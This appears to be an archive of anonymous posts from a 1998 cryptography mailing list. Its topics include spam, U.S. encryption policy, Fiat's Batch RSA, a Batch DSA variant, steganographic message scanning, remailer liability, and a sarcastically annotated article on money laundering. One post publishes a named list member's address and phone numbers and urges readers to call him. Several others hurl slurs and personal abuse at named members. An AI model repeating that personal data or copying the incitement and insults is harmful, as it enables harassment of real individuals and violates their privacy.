an "educator" beats up a student it's "discipline." If a student beats up
another student it's a "boys will be boys" situation which gets a slap on
the hand. But a student better not touch an "educator" or all kinds of hell
will rain down on them, including expulsion from a facility they have to pay
for anyway, and criminal charges.
There was a situation much like this in Texas a while back that I heard about.
Fuck the screwools.

@_date: 1998-02-23 07:47:38
@_author: Anonymous 
@_subject: Is spam really a problem? 
'Masque' here again. The same one who wrote the
original 'Is spam really a problem?' post. (I
won't attempt to prove that :-).
I'm really astounded at "sunder's" PK based solution; it's akin to proposing decapitation
as a cure for pimples.
You can't even come up with a valid analogy. Any
pager I've ever carried could be put in silent mode.
With email, you decide when to check it, and if you have two brain cells to rub together you can identify
and kill spam reliably on just the Subject and Sender
data, without reading it. To reiterate, it takes me
less time to manually kill spam than to trash the junk
in my snail mail. Spam is simply Not A Big Problem, and
much less an irritation than telemarketer calls.
What do you propose?
Oh boy. Mandatory signing, with registered keys. Great. Why not
also require people to have their SSN's tattooed on the inside of
their forearms? That way, if some one is so foolish as to say something you didn't want to hear, you'll know who to sue 'for the theft of your valuable time'.
You're doing the Surveilance State's work for it.  People who whine 'there oughta be a law' everytime anything in life goes against their expectations are helping build Big Brother. This is called 'being a Useful Idiot'.
So the rest of the world should give up privacy and anonymity to
fix your poor choice of service provider? You made your bed; now
lie in it.
sunder: get a grip. Coercive legislation is simply not the
appropriate solution for such a minor problem as spam.
Because I'm active on the list, and I spend more
time here skipping messages about spam than
I do killing actual spam.

@_date: 1998-02-24 18:12:10
@_author: Anonymous 
@_subject: Group to Attack Clinton on Crypto 
I hope that this isn't too American for us the majority on this list.  I
thought that it was relevant.
See original webpage for hyperlinks.
  Group to Attack Clinton on Crypto
  By Courtney Macavinta
  Staff Writer, CNET NEWS.COM
  February 23, 1998, 2:40 p.m. PT   A bipartisan group of politicos, high-tech companies,
  and privacy advocates will announce a broad coalition
  next week to overturn the White House's current
  encryption policy through a million-dollar media blitz
  and lobbying campaign, CNET's NEWS.COM has
  learned.
  Encryption secures digital communications, rendering
  it unreadable if intercepted. The technology is the
  center of a U.S. debate with federal law enforcement
  officials asking Congress for access to the "keys" that
  unlock encrypted data on one side, and consumer
  groups and industry representatives arguing that such
  provisions make encryption products useless and
  constitute an invasion of privacy.
  The formation of the coalition--Americans for
  Computer Privacy--signals a shift in the diligent, but
  Beltway-confined, fight against the White House's
  crypto stance. The players in the coalition will
  attempt to force encryption policy on the mainstream
  radar by convincing Americans that the government
  has plans to read their private digital discourse.
  "This will be an effort with very major financial
  backing, and this effort will be joined by a
  breathtaking coalition of interests," Jack Quinn, the
  coalition's legal adviser, told CNET's NEWS.COM
  today. Quinn is a senior partner with Arnold &
  Porter in Washington and is a former counsel to
  President Clinton.   "I think people will understand that the FBI director's
  [Louis Freeh] proposal for domestic encryption
  controls is really like asking them to make a duplicate
  of their front door key and leave it at the post office
  in case he wants to get inside...I don't think it will be
  hard to explain," he added.
  The coalition includes the Business Software Alliance,
  which will be just one of the financial backers, the
  trade group confirmed today. The hired guns to head
  up the coalition's strategy and media campaign also
  include Ed Gillespie, president of Policy Impact
  Communications and the strategist behind the
  Republican's sweeping 1994 legislative package
  known as the Contract with America; and the firm of
  Goddard-Claussen, which is best known for creating
  the famous "Harry and Louise" commercials that
  helped defeat the president's health care reform
  initiative the same year.
  In addition, Mindshare Internet Campaigns will be in
  charge of the online strategy and Web site for the
  coalition, with the Dittus Group in charge of public
  relations. Recruiting pamphlets with scant details
  about the coalition's membership, but with clearly
  laid out goals, already were circulated at the
  Computers, Freedom, and Privacy conference in
  Austin, Texas, last week.
  These forces and other yet-to-be named members of
  the coalition will try in about 50 calendar days
  remaining in Congress's session to derail legislation
  already on the table that they say will prevent private
  online communication.
  The group will fight an FBI-backed plan that would
  require all federally funded computers to store
  encryption keys with a government-approved party,
  allowing law enforcement to unscramble documents
  without users' knowledge or even a court order in
  some cases.
  "Even if you don't have a PC at your home or office,
  still there is information about you that is
  computerized; maybe it's your medical or financial
  records. We want to make sure that the technology
  that can keep that information private stays that way,"
  said Tom McMahon, a spokesman for the coalition,
  which officially will launch next Wednesday.
  In addition, the Americans for Computer Privacy will
  ramp up an ongoing battle to overturn Clinton
  administration regulations prohibiting the export of
  strong encryption products unless the codes are made
  available to law enforcement agencies. A bill know as
  the SAFE Act was the vehicle for this export relief,
  but at least one version of the bill altered by the
  House Intelligence Committee would grant law
  enforcement access to encrypted protected
  communication in the United States. (See related
  story)
  "BSA is involved in this broader coalition of users,
  industry, and privacy groups. We are coming
  together to push for a policy that is based on a
  voluntary, market-based system that is based on
  consumer demand vs. the government's demand to
  access your communication in a way that is
  unprecedented and violates privacy," said Kim
  Willard, a spokeswoman for the BSA.
  The media campaign is expected to cost more than $1
  million and will continue over the next eight months.
  The goal is to stimulate grassroots action against the
  bills that add more controls on cryptography. At the
  same time, the coalition's political heavyweights will
  be working with Congress members to secure a
  victory.
  "They clearly want to get this out to broader public
  audiences and move outside the Beltway to focus on
  what the public has at stake in this the debate," said
  Richard Claussen, whose firm will work on the TV
  campaign. "The indication is that we want to move
  pretty aggressively on this."

@_date: 1998-01-04 05:32:32
@_author: Anonymous 
@_subject: Dimitry "The Hair" Vulis 
Poor Dimitry! He can dish it out, but not take it.
Everyone should give Dimitry a call and tell him
how much he is appreciated.
Dr. Dimitry Vulis's home phone number:
Vulis, Dimitri (DV1006)         postmaster at DM.COM
   D&M Consulting Services Inc.
   67-67 Burns Street
   Forest Hills, NY 11375
   718-261-6839 (FAX) 212-725-0693
The 212 number is goes directly into his
home 718 (Brooklyn) house, and is answered
by a person.
Talk with the devil himself!

@_date: 1998-01-04 09:45:01
@_author: Anonymous 
@_subject: Microsoft 
Windows is still fucking me up the ass! I'm bleeding to death here!

@_date: 1998-01-08 03:11:02
@_author: Anonymous 
@_subject: Fiat's Batch RSA 
Batch RSA
invented by Amos Fiat
Described in Crypto 89 and J Cryptology 1997.
RSA works as follows.  The key owner chooses two secret primes p and q,
and forms their product n = p*q.  He then chooses a public exponent e
relatively prime to p-1 and q-1.  His public key is (n, e).
To encrypt a message m into cyphertext c, m is raised to the power e, mod
n: c = m^e mod n.  To decrypt the message, the key holder calculates d
as the multiplicative inverse of e mod (p-1)(q-1): d = 1/e mod (p-1)(q-1).
He recovers m from m = c^d mod n.
For simplicity, below we will write this as m = c^(1/e) mod n, where it
is understood that the 1/e is done mod (p-1)(q-1).
An RSA signature s on a message m is calculated as for a decryption:
s = m^(1/e) mod n.  The signature is verified by m ?=? s^e mod n.
The time consuming part of an RSA decryption or signature is this
exponentiation step.  e can be chosen to be small, so encryption and
verification is fast, but 1/e will generally be about the same size as n,
so many multiplications must be done to raise a number to that power.
Amos Fiat describes a method whereby multiple messages can be decrypted
or signed using only one full-sized exponentiation.  The "catch" is that
the messages must all use different exponents with the same n.
Here is a concrete example.  You want to decrypt or sign two messages,
M1 and M2, raising M1 to the 1/3 power and M2 to the 1/5 power.  Perform
the following steps:
This is the only full-sized exponentiation needed.  This gives:
This is the product of the two values that we want.  Fiat uses a trick
to disentangle the two values.  He raises I12 to the 6th power.  The
number 6 is chosen so that it is a multiple of one of the two
exponents, 3, and is 1 more than a multiple of the other exponent, 5:
which is one of the values we need.  Since I12 is the product of the two
values we want, we can recover the other value just by dividing this into
Here is another example.  Suppose we want M3^(1/7) and M4^(1/11).  (Note
that we are using prime numbers for the exponents; the reason will be
explained below.)  We calculate:
This gives us:
Again this is the product of the two values we want.  As before we will
raise this to a power which is 1 more than a multiple of one of the two
exponents (7 and 11) and is a multiple of the other one.  The smallest
such power is 22.
So we can divide to get M3^(1/7):
And we can divide to get the other value needed:
This illustrates how to derive two RSA roots using only one full sized
exponentiation.  A few small exponentiations are also needed, as well
as two divisions, but these are much faster than doing the full
exponentiation (raising to the 1/15 or 1/77 powers above).
Fiat's idea can then be applied recursively.  Note that in the examples
above we had to take two full-sized exponentiation, M12 to the 1/15 power
and M34 to the 1/77 power.  We can combine both of these exponentiations
into one just as was done above:
the product of the two values we want.  We need an exponent which is
1 more than a multiple of 15 while being a multiple of 77, giving
615, or vice versa, giving 540.  Choosing the latter since it is smaller
we have:
and dividing gives the other factor:
These values can then be fed into the expressions above to recover
M1^(1/3) and the other three values, all with only one full-sized
exponentiation for the four messages.
In general, finding the exponent for Ixx can be handled by the Chinese
Remainder Theorem.  However it requires that the two values be
relatively prime.  That is why the exponents used in Batch RSA must
all be relatively prime, so that there is a solution to the value of
the exponent for Ixx.
As the number of values in the batch increases, the "small" exponents
needed to recover the values increase as well.  We saw above that the
exponents went from 6 and 22 for the size-two batches to 540 for the
size-four batch.  This means that you reach a point of diminishing
returns where increasing the batch size no longer provides much
benefit.  Fiat suggests a batch size of n/(log^2 n) messages, where n
is the length of the full-sized exponentiation (e.g. 1000 for a 1000
bit modulus).  This would correspond to about a 10 message batch for
a 1024 bit key.
Fiat describes a few situations where it may be appropriate to use
different exponents for multiple RSA operations.  In the case of a
server issuing multiple RSA signatures it could define its public key
to be (n, e1, e2, e3,...) and specify that the signature was valid for
any exponent in the list.  Then it could batch up signatures and use a
different exponent for each one.
Another case is "pure RSA" encryption, where the message itself is broken
into blocks and each one is RSA encrypted.  In that case the blocks could
use successive exponents from the list, and the receiver could decrypt
a batch of blocks using one large exponentiation.
There is another case of interest to us, related to the task of
searching through messages from a message pool, possibly
steganographically hidden.  That will be described in another message.

@_date: 1998-01-08 17:23:02
@_author: Anonymous 
@_subject: Anonymous Remailers 
Mailbombing could be a criminal offence.
But libel is a civil and not a criminaloffence.
Under The Communications Decency Act S.230(a) no service provider is liable for content authored by others.
Even if someone use a remailer to  slander and libel further action requires private civil action.
There is absolute no reason for being concerned about defamation from the operator point of view.
The Fourth Circuit Court upheld the service provider impunity defence in a recent case
brought against American Online Inc. (Zeran v. American Online Inc.).
However,if a moderator vulunterable approves a libelous message the case could be different.
BTW, am I correct that criminal libel in no longer considered constitutional?

@_date: 1998-01-09 04:05:24
@_author: Anonymous 
@_subject: cypherpunks and guns 
Tim May doesn't know anything about Onion Routers, Crowds, or any of
the other new privacy technologies like Adam Back's prototype Eternity
service.  In truth, he has lost all interest in cryptography and now spends
his time talking about guns and making racist comments.
He wonders why the cypherpunks list no longer attracts quality
cryptographic ideas.  He need look no farther than the nearest mirror.
His violent rants and his off-topic, offensive posts have done more than
anything to drive good people off the list.
The single best thing that could happen to the cypherpunks list (and the
cypherpunks movement, for that matter) would be for Tim May to leave the
list and disassociate himself from the cypherpunks.  He would be much
more comfortable joining the KKK and the local militia.  After him,
Paul Bradley, William Geiger and Dimitri Vulis can follow.
This will leave fine thinkers with good hearts like Adam Back, Bill
Stewart, Wei Dai and others, people who still believe that cryptography
can make a strong contribution to our freedom.

@_date: 1998-01-09 14:22:48
@_author: Anonymous 
@_subject: Accounts payable 
Timmy C[rook] May is just a poor excuse for an unschooled, retarded thug.
         (_) _____ (_)
            /O   O\   Timmy C[rook] May
           !   I   !
           ! \___/ !
            \_____/

@_date: 1998-01-09 17:54:16
@_author: Anonymous 
@_subject: a good example of bad crypto hype 
Bawahahahaha. That's the biggest bunch of complete bullshit I've read in
years. Thanks, Meganet, you made my night. They must be smoking crack and a
lot of it.

@_date: 1998-01-09 23:28:42
@_author: Anonymous 
@_subject: Cute 
Tim May is cute and cuddly!
         (_) _____ (_)
            /O   O\   Timmy C[uddly] May
           !   I   !
           ! \___/ !
            \_____/

@_date: 1998-01-10 03:51:57
@_author: Anonymous 
@_subject: Batch DSA 
Batch DSA
Amos Fiat invented a way to do multiple RSA signatures using only one
full-sized exponentiation [J Cryptology v10 n2 p75].  The trick is to
sign each one with a different RSA key, where the keys all share the
same modulus n but differ in their public exponents e.
A similar technique allows DSA signatures to be batched.  As with
Batch RSA, each message ends up being signed with a different DSA key,
where the keys share the same p, q, and g values, but differ in their
public y values, where y = g^x mod p for a secret x.
These techniques may be useful for situations where heavily loaded servers
need to digitally sign many responses.
A DSA signature on a message M (where M is the hash of the actual data)
is done as follows:
Then (R, S) is the signature.
The time consuming part of this is the calculation of g^k.  This is the
only exponentiation which must be done.  All the other calculations can
be very fast.
We can't re-use a k value because it allows x to be discovered very
easily.  If two signatures (R, S_1) and (R, S_2) use the same k value,
we have (mod q):
The capitalized values are known, the lower case k and x are the unknowns.
We have two equations in two unknowns, which allows us to recover k and x.
If different x values are used for each signature, then it should be safe
to re-use k.  This is how Batch DSA would work.
The signer would publish his public key as p, q, and g as usual, but now
he would publish multiple y_i = g^x_i values.  The convention is that
any message is considered signed by the key if it is signed by any of the
To sign a batch of messages, one k value is used for all of them.  The
same calculation as above is used:
The signature is (R, S_i, i), where the index i is included to tell the
verifier which y_i to use.
This is not vulnerable to the problem above of re-using k.  The multiple
signatures have the relationships:
We always have more unknowns than there are equations, which hides the
values of k and x_i.
This same technique can be applied to most other discrete log signatures,
which generally have the same structure although they differ in the details
of how x and k are used to construct R and S.
With Batch RSA, there is a tradeoff between batch size and efficiency.
The calculations become inefficient for batch sizes larger than tens
of messages when keys are about 1K bits.
Batch DSA can efficiently handle larger batches, but it has a tradeoff
between batch size and key size.  Each key variant requires specifying a
full-sized y value, while with Batch RSA the variants just required
listing a small e value (and possibly not even that, if the exponents
are the small primes).  This will limit Batch DSA in most circumstances
to similar batch sizes of on the order of tens of messages, otherwise
the keys become unreasonably large.

@_date: 1998-01-10 05:18:50
@_author: Anonymous 
@_subject: Batch RSA for stego data 
Problem: Suppose there is a source of data which looks like random noise
but which contains embedded messages.  This may be a subliminal channel
in a crypto protocol, steganographically embedded data, or even a simple
message pool where you want to disguise what key each message is for.
How do you scan and identify messages for you?
Solution: Extract bits as appropraite, apply whatever selection rules
are necessary to pull them out of the stego'd data or other source.
Some fraction of what results is messages for you, the remainder is
noise or messages for someone else, which will be indistinguishable.
Method 1: For finding messages sent by someone you have communicated
with previously.  Use shared secret data to flag the message.
Method 1A: each time you send a message, include (in the encrypted
portion) a 64-bit random value which will be used to flag the next
message to them.  Prepend the encrypted message with the 64 bit random
value from the previous message.  Each person keeps a list of the next
random value to be expected from each communicant.  The extracted data
can be easily scanned to see if it matches anything on the list.
Method 1B: use shared secret data and a sequence number to calculate a
hash which will be used to flag the next message sent.  This can be
used to calculate the flag value to be expected for the next message
from each sender, which can be compared against each potential
For both methods 1A and 1B, once the message is recognized a shared
secret key is used to decrypt the remainder of the data past the flag
portion.  The shared secret key can be changed after each message
using similar techniques to changing the flags.  (Safety tip: don't
make the shared secret key the same as the flag value.)
Method 2: For finding messages sent by someone you have never communicated
with previously.
Method 2A: Sender encrypts a low-entropy flag message with receiver's
public key, pads it so it looks like random noise, and puts that at
the start of each message.  Receiver decrypts the beginning of each
message using his private key, looking to see if the results are low
entropy.  When such a message is detected the secret key for
decrypting the remainder of the message can be embedded in the
low-entropy portion.
Method 2B: Like 2A, but use Fiat's "Batch RSA" to decrypt multiple
messages in one batch.  Recipient publishes his public key with
multiple legal exponents (say, the first 16 primes).  Sender encrypts
his low-entropy message choosing one of the encryption exponents at
random.  He checks to see if the low bits of the encryption output
match the index of the encryption exponent (e.g. if the 7th encryption
exponent was chosen then the low order 4 bits should hold the value
7).  He repeatedly encrypts with different random padding until he
finds an encrypted form which properly encodes the exponent.  Receiver
batches messages together such that the low order 4 bits of each
message in the batch are different, and applies the Batch RSA
decryption to try decrypting each message.  As before the receiver
looks to see if the result is low entropy.
For both 2A and 2B it may be possible to do the decryption using only
one of the two RSA primes, if the encrypted data was smaller than that
prime value.  (This idea comes from Shamir.)  Even if not, the Batch
RSA algorithm can be applied separately for the two primes and then
the results combined at the end for each message via the CRT, as is
often done for RSA decryption.

@_date: 1998-01-10 16:51:08
@_author: Anonymous 
@_subject: Surprise - Anonymous Journalist Opposes Laundering [1/4] 
The following series of posts is extracted from E-Communist. In this article the writer (but a mere cog in the Anonymous Entity known as GovernMedia NLC), exhibits the guVermin cheerleading so pervasive among those in his/her profession.
In keeping with the spirit of anonymous advocacy favoring global fiscal tyranny, "our" collectivistic comments are in brackets as indicated: [S'n'S]
Originally assigned the staid title 'Money Laundering', "we" have taken the
indecent liberty of naming each post separately:
countries set up the Financial Action Task Force (FATF) [not to be confused
with the BATF] in 1989. Based at the OECD [worthle$$ bureaucracy  in Paris, this now has 26 member countries, which are supposed to abide by
its 40 recommendations. Among other things, these encourage mutual assistance in laundering cases. International co-operation is also being fostered by financial-intelligence units [FiUs], some of which recently set up a special computer network to swap information about laundering cases.
A statistical black hole
What effect has all this had? It is hard to tell for sure, but such evidence
as looks reliable is hardly encouraging [discouraging]. A report published in 1995 by AUSTRAC, [worthle$$ bureaucracy  Australia's financial-intelligence unit, concluded that between A$1 billion and A$4.5
billion ($740m-3.3 billion) was washed through Australia each year. The
report noted that if this figure is accurate, then Australian poLice were
recouping [recouping?, proceeds of voluntary exchanges are considered stolen
when in fact those doing the "recouping" are the criminals] barely 1% of all
the ["]dirty["] money that they [_]guess[_] is flowing into [but not flowing
out of? It must be all those "dirty" foreigners corrupting the innocent Aussie drug addicts and tax evaders] the country--a surprisingly low figure
given that Australia is widely acknowledged to have one of the most comprehensive anti-laundering regimes in the world.
[so AUSTRAC thugs are basing their conclusions on guesstimates, which, if
as accurate as they kinda sorta think they might be indicates:
Minions of the Australian FIU stole, that is, recouped, some 10-45mil AUD in cash and an unspecified amount of other property, but this is "barely 1%"
of the _potential_ bounty to be had in the lucrative worldwide industry of
asset forfeiture.
Allow me to "guesstimate" a couple of other conclusions they may have made:
1) AUSTRAC lacks sufficient funding (AUSTRAC clerks still lack vacation 2) AUSTRAC lacks sufficient personnel (AUSTRAC entry teams are still without
When it comes to prosecutions of money launderers, few countries keep reliable statistics, often because laundering was only recently deemed a separate ["]crime["]. One that does is the Netherlands. According to its
justice ministry, in 1995 some 16,125 [subjectively] ["]suspect["] transactions were reported to the country's financial-intelligence [looting]
unit. Only 14% of these were sufficiently dubious [read: juicy confiscatable
assets of sufficient size coming to their attention due to amateurish
operations that lacked political protection which made these "suspect" assets worth the time and effort to grab] to pass to the poLice, and only 0.5% of the original total led to prosecutions. [no mention of the % of cases that led to confiscations] Anecdotal evidence suggests a similar lack-of-["]success["] elsewhere.
Why aren't more laundrymen being caught? [what about laundrywomen, the sexist pigs!] The answer, say those leading the fight against dirty [free]
money, is that most anti-laundering regimes are still in their infancy. [yet
to grow into the horrid monsters of their wet dreams] But, they say, at least the situation is improving. [deteriorating] Stanley Morris, FINCEN's
[worthle$$ named bureaucracy  director [thug], says undercover operations
in America show that launderers' fees have risen from around 6% of the money
washed in the early 1980s, to 25-28% today. The explanation is that laundering is getting harder and riskier--and hence more expensive. Some experts also claim that a recent increase in the ["]smuggling["] of cash across borders is a sign that [gasp] more ["]criminal["] ["]loot["] is shunning banks. [meaning people are fed up with American banks, American regulators and America in general: "sell off, cash in and drop out".]
There has also been some progress internationally. A few well-known haunts
of launderers, such as Switzerland and the Cayman Islands, have made it easier for bankers to report ["]suspect["] transactions [reclaiming lost virginity] without breaking bank-secrecy laws, and for their financial gumshoes to co-operate with foreign ones. [meaning they already have so much
money on deposit that it won't effect profits significantly, besides which, the typical lazy African dictators' first choice remains CH and those who
are concerned about such matters have long since moved to greener pastures
anyway...] In February, Antigua, another Caribbean haven, closed five out of
six Russian offshore banks because of concerns that they had been laundering
money for Russia's mafia. [no security through obscurity there] The FATF has
also cracked down. [pun intended?] Last year, for the first time, it publicly upbraided one of its members, Turkey, for not introducing an anti-laundering law. [Turkey, a typical 3rd world pit, is too busy stealing
from its citizens via hyperinflation to bother with passing pro-looting legislation.] And it gave banks a warning abot dealing with Seychelles after
the government offered anyone placing $10m or more in certain investments immunity from prosecution [no STO there either]. The law containing this open invitation [more like comic relief] to crooked cash has since been Fly low
Pro:__Money Laundering__Self Medication__Militia Grade Arms__Realism________
__Indirect Taxation___________Adults___________Individual Irrevocable Right$
} 	Smurf N Sniff		Non-Member, Gunfiscators of Canberra	   |
} 	P.O. Bunker 6669	"We don't want to be like those paranoid   |
} 	Hohoe, Ghana		Americans, this is a social DemoBracy."    |
} 	fn-fal at edict.gov.un	+233 55 1234	boycott GovernMedia NLC    |
ANTI:_feral guVermin____Vooters__________blue hellmutts______nihilists______
__biometric herd management__"(The) children"__state granted privilege_____!

@_date: 1998-01-10 17:07:25
@_author: Anonymous 
@_subject: your mail 
Uh, you subscribe to the list but you can't find Vulis' address? Just how
stupid are you?

@_date: 1998-01-10 21:35:27
@_author: Anonymous 
@_subject: Surprise - Anonymous Journalist Opposes Laundering [2/4] 
Taken to the cleaners
["]Un["]fortunately, some of this is not as encouraging as it sounds. For a start, the ["]dirty["] money leaving banks may end up polluting other businesses [MONEY LAUNDERING IS GOOD FOR BUSINESS]. PoLice in Texas
say that foreign-exchange bureaux there have been a primary conduit for
channelling drug money to and from Mexico. Insurers are also vulnerable. One
recent laundering wheeze involves buying single-premium insurance policies
with ["]dirty["] money. These are then cashed in early in return for a "clean" cheque from the insurer, or used as collateral for a bank loan.
[On the way: Currency Transaction Reports for purchase of insurance policies
with cash and Early Redemption Reports for policies held less than 50 years.
Insurance agents will be required to report "suspicious" policy holders and
report possible "structuring" violations. Then they'll wonder why customers
are "shunning" insurance companies.] Even the rising cost of laundering may
not be unalloyed good news. It may simply reflect the emergence of a new group of professional launderers who are better at beating the system, and
charge more for doing so. [Or as Comrade Clinton would put it, "getting their fair share"] Some poLiceman fear that these experts may soon be using
electronic-cash systems to speed up the wash cycle (see box on next page).
[See post 4/4]
Worse [Better], as old laundering centres close their doors, new ones are opening theirs. The table above [shown below this paragraph] shows the countries that the State Department thinks face a severe money-laundering problem. (Even states with tough anti-laundering rules, such as America and Britain, are listed if their vigilance is considered essential in the
global fight against laundering.) The striking thing about the ranking is that it includes islands such as Cyprus, a ["]hive["] of offshore activity
for the Russian mafia, and Aruba, a Dutch dependency in the Caribbean, which
were not associated with laundering a few years ago. [Translation: Aruba
et. al. have always been on their shit list, and now that they've taken out the higher-priority targets e.g. CH and Cayman, the NWO _Microchip Extremists_
are setting their sights on shutting down the lower-yield peripheral sites.
(which they've "only just recently discovered" are pro-privacy areas)]
Another notable inclusion is Mexico, which the report describes as "the
money-laundering haven of choice for initial placement of US currency in the
world's financial system". In March, the [criminal] Mexican government unveiled a series of anti-laundering [fig leaf] measures in a belated effort
to clean up its reputation.
Laundry list
"High-priority" laundering centres,
March 1997
Aruba			yes	.	.	yes
Canada			yes	yes	yes	yes
Cayman Islands		yes	yes	.	yes
Colombia		yes	.	.	yes
Cyprus			yes	na	yes	yes
[Doesn't indicate differences between Greek and Turkish regs, if any.]
Germany			yes	.	.	yes
Hong Kong		yes	yes	.	yes
Italy			yes	yes	yes	yes
Mexico			yes	.	yes	.
Netherlands		yes	yes	yes	yes
Netherlands Antilles	yes	.	.	yes
Nigeria			yes	.	.	na
Panama			.	.	yes	yes
Russia			.	.	.	.
Singapore		yes	.	yes	yes
Thailand		.	.	.	.
Turkey			.	.	.	.
Britain			yes	yes	yes	yes
United States		yes	yes	yes	yes
Venezuela		yes	.	yes	yes
A Banks required (or permitted) to report suspicious transactions.
[Communese translation: entry-level bank tellers required (or permitted) to
make subjective determinations as to customers' intent and/or state of mind.
Required (or permitted) to report people encountered on city streets who
may be shunning banks in favor of foreign-exchange houses and cheque-cashing
outlets. Development of mind-reading skills mandated by executive order.]
B Government permits sharing of seized assets with other governments that assisted the underlying investigation.
[Communese translation: Thieves drawing paycheques from extorted proceeds allowed to share stolen goods with accomplices in other jurisdictions.
The Legislator/B-Crat/Snitch/Judge motto: "We Know Em When We Seize Um"]
C Non-banks must meet same anti-laundering provisions as banks.
[Communese translation: The woman with an appearance approximating the Wicked Witch of the West sitting behind the .357 Magnum resistant plastic that slips you 10,000,000 Bongonian bellylints in exchange for 10 euros is also a deputized collectivist agent/informant.]
D Financial institutions and employees who provide otherwise confidential
data to investigators pursuing authorized investigations are protected from
[Communese translation:
Deputized Government Agents/Informants (that is, anyone with whom you exchange legal tender bank notes, a.k.a. "dirty" money) who provide "otherwise confidential" data so that "authorized investigators" may empty
your bank account are not accomplices to looters with sovereign immunity.]
Source: US Department of State (International Narcotics Control Strategy
[Source: Illegitimate Spawn of Hegel (Global Currency Confiscation Strategy
[Notice again that the less fiscally totalitarian states are those actively
engaged in recalling their worthless currencies, forbidding (in theory) their domestic hostages from sending capital abroad, forbidding (in theory) holding gold or using other means of protection from criminal governments, defaulting on foreign loans and various shenanigans in a similar vein. From
this it can be concluded that for those on the outside looking in, chronic economic mismanagement and chaos are not necessarily a negative, these areas provide excellent entry points in the "rewire-chain"...]
In the future, more Asian countries could be added to the list. Rick McDonell [, looter ], the FATF's representative [of Satan] in Asia, warns that the region is ["]vulnerable["] to laundering because many of its economies are heavily cash-based. [Solution: go hire Jerry Seinfeld, Patrick Stewart and all the other convenience-card whores to shill for the cashless
society in Bangkok, Guangzhou and Kuala Lumpur?] Moreover, some countries such as India and Pakistan have large "underground" banking systems which sit alongside official ones [hawala]. Usually based on family or regional networks, these shift large amounts of money [and other stored units of value, e.g. crates of Avtomat Kalashnikova, "illegal" cash crops, RPGs, precious stones] around anonymously and cheaply. [25-28% markup indeed! Forget that rubbish] Such attractions, plus a lack of anti-laundering legislation, have already turned Thailand into a launderers' paradise. A report published last year [yet another report, this journalist needs to get
out into the real world, hanging with fiscal bureaucrats and professors is stunting Anon-E-Communists' growth] by Bangkok's Chulalongkorn University put the amount of money washing through the country each year at 730 billion
baht ($28.5 billion). This is equivalent to 15% of Thai GDP.
[In future watch for the following commercials to be run in these
vulnerable-to-laundering cash-based-economy television markets:
(Jackie Chan dubbed in various local dialects)
Fly low
Pro: Money Laundering, Self-Medication, Militia-Grade Arms, Realism
Pro: Indirect Taxation, Adults, Individual Irrevocable Rights
} 	Smurf N Sniff		Non-Member, Gunfiscators of Canberra	   |
} 	P.O. Bunker 6669	"We don't want to be like those paranoid   |
} 	Hohoe, Ghana		Americans, this is a social DemoBracy."    |
} 	fn-fal at edict.gov.un	+233 55 1234	boycott GovernMedia NLC    |
Anti: feral guVermin, Vooters, rapacious tyrants, nihilists
Anti: biometric herd management, "(The)" children, state granted privileges

@_date: 1998-01-11 00:45:19
@_author: Anonymous 
@_subject: Surprise - Anonymous Journalist Opposes Laundering [4/4] 
Next, cyberlaundering?
If there is one thing that money launderers hate it is cash; physical cash,
that is [No, we hate criminal governments who refuse to issue larger denomination notes]. Shipping huge wads of banknotes is a logistical nightmare [which would be less onerous if, by way of example, the US guVermin recirculated $500, $1000, $5000 and $10,000 FRNs. The printing plates for such "money-laundering friendly" notes having been de-activated since the reign of dictator Roosevelt; refusal to issue higher denomination FRNs to keep pace with Accumulated Wealth Tax extractions (commonly referred
to as "inflation") since the 1930s is nothing less than slow-motion, backdoor currency recall]. It also raises the risk that couriers will be intercepted [they mean robbed] and the ["]loot["] traced back to its source.
Transferring money electronically is both quicker and easier [but not necessarily safer in certain nations]. [*]Hence concerns in law-enforcement circles that new forms of electronic money could render obsolete traditional
methods of tracking ["]tainted["] money, which rely heavily on the poLicing
of bank transactions[*]. ["Hence concerns in law-evasion circles that new forms of vooter sanity threatening to outlaw drug Prohibition could render obsolete traditional streams of tax-free income."]
["Hence concerns in law-enforcement circles that new forms of vooter sanity threatening to outlaw drug Prohibition could render obsolete traditional pretexts for increased budgets, privacy deprivation and sheeple tracking."]
Electronic-money systems come in three different forms. There are stored-value cards, which allow customers to load money onto a microchip-bearing piece of plastic. This can then be carried around like a credit card. There are computer-based systems, for example, those involving
payments over the Internet. and there is talk of hybrid systems, which allow
smart cards and network-based payments to work together.
Although these new gizmos are still under development, financial regulators
and policemen have been studying them intently. And they have raised several
questions to which they want answers. One is whether limits will be placed
on value that can be held on chip-bearing cards. A card without a limit
"could break my back", [then there would be no need for a tree] worries Stanley Morris, [the anti-christ, ] who heads FINCEN, the American government's financial-intelligence unit [FiU]. He thinks launderers could use it to shift millions of dollars on a piece of plastic.
The anti-laundering brigade [brigands?!] also wants reassurance that crooks
will not be able to set themselves up as e-money issuers. [I guess as opposed to the crooks who set themselves up as fiat banknote issuers] And they want to know whether all transactions in whatever system will be logged
at a central point, so that investigators can reconstruct an [unencrypted??]
electronic audit trail ["]if necessary["]. [B.S., they don't "want reassurance" or "want to know" squat, this is their non-negotiable DEMAND; they will try to rob, kidnap, jail, and murder anyone who thinks different] At least one card-based system currently being developed by Mondex, a company owned by Master-Card, [MassaCard] is designed to allow money to be
transferred directly between cards, without leaving such a trail. DigiCash,
which is developing a computer-based payment system, is using what it calls
a "one-way privacy" method, which allows payers to check who received money
from them, but does not allow the recipients to find out where it came from.
[as in a postal money order (but sans the silly $700 per m.o. limit and the
ridiculous $2999.99 daily limit) sent to a payee anonymously]
While these and other issues, such as who will have jurisdiction over
laundering on the Internet, [I smell a brand new Global Bureaucracy in the air] suggest the new systems could cause the authorities a few headaches,
some experts beg to differ. A report published last year by the Bank for
International Settlements, [another report cited, another worthle$$ bureaucracy, amazing isn't it?] the central bankers' central bank, [in other
words, a den of iniquity] noted that in most cases, measures designed to
protect the new systems against fraud--such as attaching unique electronic
serial numbers to transactions--would make them less attractive for criminal
activities than many existing payment systems. At the moment, all financial
regulators can do is watch and wait.
[Remember if you do your banking in a socialist country, there are three
parties involved in any transaction:
Fly Low
Pro: Money Laundering, Self-Medication, Militia-Grade Arms, Realism
Pro: Indirect Taxation, Adults, Individual Irrevocable Rights
} 	Smurf N Sniff		Non-Member, Gunfiscators of Canberra	   |
} 	P.O. Bunker 6669	"We don't want to be like those paranoid   |
} 	Hohoe, Ghana		Americans, this is a social DemoBracy."    |
} 	fn-fal at edict.gov.un	+233 55 1234	boycott GovernMedia NLC    |
Anti: feral guVermin, Vooters, rapacious tyrants, nihilists
Anti: biometric herd management, "(The)" children, state granted privileges

@_date: 1998-01-11 00:45:24
@_author: Anonymous 
